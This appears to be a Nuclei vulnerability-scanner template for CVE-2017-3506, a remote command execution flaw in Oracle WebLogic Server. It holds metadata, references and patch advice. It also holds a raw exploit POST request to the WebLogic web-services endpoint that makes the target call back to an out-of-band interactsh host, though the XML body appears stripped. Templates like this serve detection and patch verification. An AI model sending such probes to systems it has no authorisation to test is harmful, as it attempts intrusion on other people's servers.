id: CVE-2017-3506 info: name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution author: pdteam severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. remediation: | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - http://www.securitytracker.com/id/1038296 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 epss-score: 0.96927 epss-percentile: 0.99647 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: weblogic_server tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle http: - raw: - | POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Content-Type: text/xml;charset=UTF-8 http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" # digest: 4b0a00483046022100bb259cb8fdd93f7b44c09137994d856289b428fa1d1e7c9c2075b4df5214370402210091e8e726c4416b812484e15b6c82d9f4527d5590a48769dbbb7255e6db43af38:922c64590222798bb761d5b6d8e72950